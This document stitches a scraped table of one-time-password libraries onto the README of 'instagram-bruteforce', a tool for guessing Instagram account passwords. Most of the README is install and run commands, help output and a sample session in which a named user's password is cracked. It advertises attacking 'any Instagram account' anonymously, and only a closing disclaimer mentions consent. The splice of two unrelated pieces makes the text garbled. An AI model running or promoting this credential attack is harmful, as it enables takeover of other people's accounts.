Project Name | Stars | Downloads | Repos Using This | Packages Using This | Most Recent Commit | Total Releases | Latest Release | Open Issues | License | Language |
---|---|---|---|---|---|---|---|---|---|---|
Rotp | 1,498 | 2,527 | 48 | 3 days ago | 36 | September 30, 2020 | 7 | mit | Ruby | |
Ruby One Time Password library | ||||||||||
Ios Application | 741 | 3 months ago | 44 | other | Swift | |||||
A native, lightweight and secure one-time-password (OTP) client built for iOS; Raivo OTP! | ||||||||||
Onetimepass | 647 | 62 | 5 | a year ago | 6 | July 31, 2015 | 10 | mit | Python | |
One-time password library for HMAC-based (HOTP) and time-based (TOTP) passwords | ||||||||||
50m_ctf_writeup | 542 | 4 years ago | 1 | |||||||
$50 Million CTF from Hackerone - Writeup | ||||||||||
Notp | 542 | 169 | 65 | 4 years ago | 5 | October 14, 2014 | 17 | mit | JavaScript | |
Node One Time Password library, supports HOTP, TOTP and works with Google Authenticator | ||||||||||
Java Otp | 361 | 1 | 8 months ago | 5 | July 31, 2022 | mit | Java | |||
A one-time password (HOTP/TOTP) library for Java | ||||||||||
Gotp | 348 | 3 | 34 | 5 months ago | 1 | September 15, 2022 | mit | Go | ||
Golang OTP(One-Time Password) Library. | ||||||||||
Nimble_totp | 307 | 1 | a day ago | 5 | May 02, 2022 | Elixir | ||||
A tiny Elixir library for time-based one time passwords (TOTP) | ||||||||||
Java Totp | 163 | a year ago | 10 | November 05, 2020 | 13 | mit | Java | |||
A java library for implementing Time-based One Time Passwords for Multi-Factor Authentication. | ||||||||||
Kotlin Onetimepassword | 95 | 2 months ago | 7 | August 23, 2022 | apache-2.0 | Kotlin | ||||
A Kotlin one-time password library to generate "Google Authenticator", "Time-based One-time Password" (TOTP) and "HMAC-based One-time Password" (HOTP) codes based on RFC 4226 and 6238. |
instagram-bruteforce
This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden.
I'm no longer maintaining this project.
,,,
pip3 install -r requirements.txt
python3 instagram.py <username> <passwords.lst>
python3 instagram.py <username> <passwords.lst> -m 32 (maximum bot use 32)
C:\Users\aladdin\Desktop\Instagram>python3 instagram.py -h
usage: instagram.py [-h] [-m MODE] username wordlist
positional arguments:
username email or username
wordlist password list
optional arguments:
-h, --help show this help message and exit
-m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots
python3 instagram.py <username> <wordlist> -m <mode>
This mode uses only 4 bots, or 64 passwords at a time.
C:\Users\aladdin\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3
This mode uses 8 bots, or 128 passwords at a time.
C:\Users\aladdin\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2
This mode uses 16 bots, or 256 passwords at a time.
C:\Users\aladdin\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1
This mode uses 32 bots, or 512 passwords at a time.
C:\Users\aladdin\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0
[-] Wordlist: pass.lst
[-] Username: Sami09.1
[-] Password: 272
[-] Complete: 45.51%
[-] Attempts: 228
[-] Browsers: 273
[-] Exists: True
[-] Wordlist: pass.lst
[-] Username: Sami09.1
[-] Password: Sami123
[-] Complete: 62.67%
[-] Attempts: 314
[-] Browsers: 185
[-] Exists: True
[!] Password Found
[+] Username: Sami09.1
[+] Password: Sami123
Usage of the tool for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program